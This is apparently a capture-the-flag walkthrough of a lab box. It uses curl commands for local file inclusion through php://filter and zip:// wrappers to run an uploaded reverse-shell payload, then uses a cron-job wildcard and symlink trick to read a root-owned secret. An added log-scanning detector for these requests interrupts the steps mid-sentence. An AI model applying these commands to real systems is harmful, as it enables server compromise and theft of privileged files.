80

The file parameter on index.php suggests a possible LFI, which we can test with the php://filter wrapper:
curl http://192.168.182.229/index.php?file=php://filter/read=convert.base64-encode/resource=home --path-as-is
This returns the page source base64-encoded; decoding it gives us home.html:
curl http://192.168.182.229/index.php?file=php://filter/read=convert.base64-encode/resource=home --path-as-is | base64 -d > home.html
The application appears to append .php to the requested filename. We can fetch upload.php the same way:
curl http://192.168.182.229/index.php?file=php://filter/read=convert.base64-encode/resource=upload --path-as-is | base64 -d > upload.php

We can upload our reverse shell through the upload form. After uploading, the page shows a "click here to download the file" link,
which reveals the name of the uploaded zip. This zip contains our payload.php file, so we can include it through the zip:// wrapper:
curl http://192.168.182.229/index.php?file=zip://uploads/upload_1723720412.zip%23payload
We don't add .php to the member name here because .php is appended to the filename automatically.
To get a shell:
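From the defender's side, the two requests above leave a clear trace in the web server's access log. The following is an added detection example, not part of the original writeup: it scans constructed Apache-style log lines for stream wrappers (php://, zip://, and similar), zip member fragments, and path traversal in the file parameter; the parameter name, log format and sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Stream wrappers that should never appear in a filename parameter of a
# PHP include; php://filter and zip:// are the two used in the writeup.
SUSPICIOUS_WRAPPERS = ("php://", "zip://", "phar://", "data://",
                       "expect://", "file://", "glob://")
# Assumption: the application selects the included file via ?file=
FILE_PARAMS = ("file",)

# Apache combined/common log format (constructed sample lines below)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log lines: one benign request, then the php://filter
# read, the zip:// include and a traversal attempt, all in the file parameter.
LOG_LINES = [
    '10.0.0.5 - - [15/Aug/2024:12:00:01 +0000] "GET /index.php?file=home HTTP/1.1" 200 512',
    '10.0.0.9 - - [15/Aug/2024:12:00:07 +0000] "GET /index.php?file=php://filter/read=convert.base64-encode/resource=home HTTP/1.1" 200 1400',
    '10.0.0.9 - - [15/Aug/2024:12:01:12 +0000] "GET /index.php?file=zip://uploads/upload_1723720412.zip%23payload HTTP/1.1" 200 88',
    '10.0.0.9 - - [15/Aug/2024:12:01:30 +0000] "GET /index.php?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 900',
]


def classify_request(target):
    """Return a list of findings for one request target (path plus query)."""
    findings = []
    query = urlsplit(target).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name not in FILE_PARAMS:
            continue
        for value in values:
            # parse_qs decodes once; decode again so double-encoded
            # values such as %2570hp%3A%2F%2F are also normalised.
            decoded = unquote(unquote(value)).lower()
            for wrapper in SUSPICIOUS_WRAPPERS:
                if decoded.startswith(wrapper):
                    findings.append(f"{name}: {wrapper} wrapper")
            if "../" in decoded or "..\\" in decoded:
                findings.append(f"{name}: path traversal")
            if "#" in decoded:
                findings.append(f"{name}: fragment in filename (zip:// member selector)")
    return findings


def scan_log(lines):
    """Yield (ip, target, findings) for every request that raises a finding."""
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in the expected format
        findings = classify_request(match.group("target"))
        if findings:
            yield match.group("ip"), match.group("target"), findings
```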
Running linpeas.sh, we find a cron job running as root.
We can use the wildcard spare trick against it to read a file as root:
cd /var/www/html/uploads
touch @root.zip
ln -s /root/secret root.zip
An enox.zip symlink to /root/secret was already present, so the password had already been exposed. We have the secret. Using the password:
We are root.